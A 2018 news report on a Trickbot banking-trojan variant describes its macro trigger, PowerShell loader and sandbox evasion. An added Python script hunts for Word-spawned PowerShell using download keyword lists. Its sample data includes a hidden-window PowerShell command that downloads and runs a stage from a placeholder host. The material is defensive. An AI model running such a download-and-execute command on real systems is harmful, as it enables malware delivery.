Credential-Stealing Financial Trojan Targets Banks
Infosecurity Magazine | August 15, 2018
Financial institutions have long been targets of cyberattack, and today researchers at Cyberbit announced they have discovered a new variant of Trickbot, a modular malware and well-known financial Trojan that targets customers of large banks and steals their credentials. Since it was first discovered in 2016, new variants have emerged, updated with new tricks and modules.

Researchers analyzed Trickbot's most recent infection vector, a malicious Word document that only executes its macro after a user has both clicked "enable content" and resized the window by zooming in and out of the document. Once a user has performed both of these actions, the macro runs a PowerShell script that downloads and executes the Trickbot payload.

Researchers noted that the variant leverages a variety of new evasion techniques, including a stealthy code-injection technique that performs process hollowing for unpacking, as was seen in older samples of Trickbot. In this variant, however, the process hollowing is done using direct system calls rather than the usual API calls, which sidesteps user-mode API hooks. In addition, by calling long and short sleeps, the malware sleeps for anywhere from 11 to 30 seconds, outlasting the execution window of many sandboxes.
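The infection chain above (Word document, user interaction, PowerShell download-and-execute, then a delay of 11 to 30 seconds) is something a defender can hunt for in process telemetry regardless of the specific sample. The following is an added example, not code from Cyberbit or Infosecurity Magazine: it runs simple detection logic over constructed process-creation events in the shape a Sysmon-style or EDR sensor would emit. The event fields (`parent`, `image`, `cmdline`, `first_net_ts`), the marker list, and the 11-second threshold applied to the time between process start and first network activity are assumptions chosen to illustrate the article's observations.

```python
"""Hunt for the Office -> PowerShell download chain described in the article.

Added example (constructed), not the vendor's detection logic. Events are
modelled after Sysmon/EDR process-creation telemetry, with an optional
timestamp of the child's first outbound network connection.
"""
from dataclasses import dataclass
from typing import List, Optional, Dict

# Parent images whose spawning of a script host is rarely legitimate.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}

# Substrings commonly seen when PowerShell is used to fetch a stage from the network.
DOWNLOAD_MARKERS = (
    "downloadstring", "downloadfile", "invoke-webrequest",
    "net.webclient", "start-bitstransfer",
)

# Assumed threshold: the article reports sleeps of 11 to 30 seconds, so a
# child that waits at least this long before its first connection is notable.
DELAY_THRESHOLD_SECONDS = 11.0


@dataclass
class ProcEvent:
    ts: float                      # process creation time (seconds, relative)
    parent: str                    # parent image name
    image: str                     # child image name
    cmdline: str                   # child command line
    first_net_ts: Optional[float]  # first outbound connection, None if never


def is_office_to_powershell(ev: ProcEvent) -> bool:
    """True when an Office application spawns a PowerShell host."""
    return ev.parent.lower() in OFFICE_PARENTS and ev.image.lower() in SCRIPT_HOSTS


def has_download_cradle(cmdline: str) -> bool:
    """True when the command line shows network download behaviour."""
    lowered = cmdline.lower()
    return any(marker in lowered for marker in DOWNLOAD_MARKERS)


def delayed_network(ev: ProcEvent) -> bool:
    """True when the child sat idle for at least the threshold before beaconing."""
    if ev.first_net_ts is None:
        return False
    return (ev.first_net_ts - ev.ts) >= DELAY_THRESHOLD_SECONDS


def detect(events: List[ProcEvent]) -> List[Dict]:
    """Return one finding per Office -> PowerShell spawn, ranked by severity."""
    findings = []
    for ev in events:
        if not is_office_to_powershell(ev):
            continue
        cradle = has_download_cradle(ev.cmdline)
        findings.append({
            "ts": ev.ts,
            "severity": "high" if cradle else "medium",
            "download_cradle": cradle,
            "delayed_network": delayed_network(ev),
            "cmdline": ev.cmdline,
        })
    return findings


# Constructed sample telemetry; the host and document names are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(0.0, "explorer.exe", "winword.exe",
              '"C:\\Program Files\\Microsoft Office\\WINWORD.EXE" invoice.doc', None),
    ProcEvent(12.5, "winword.exe", "powershell.exe",
              "powershell -w hidden -nop -c IEX (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/stage')", 31.0),
    ProcEvent(40.0, "winword.exe", "powershell.exe",
              "powershell -c Get-Date", 40.2),
    ProcEvent(50.0, "explorer.exe", "powershell.exe",
              "powershell -c Get-Process", None),
]


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

On the constructed input this reports two findings: the download cradle spawned by Word is rated high and also shows an 18.5-second gap before its first connection, while the second Word-spawned PowerShell is rated medium with no delay. The `explorer.exe` spawn is ignored because the parent is not an Office application. In practice the parent/child check is the durable signal; the command-line markers and the delay threshold are tuning knobs that need adjusting to the environment.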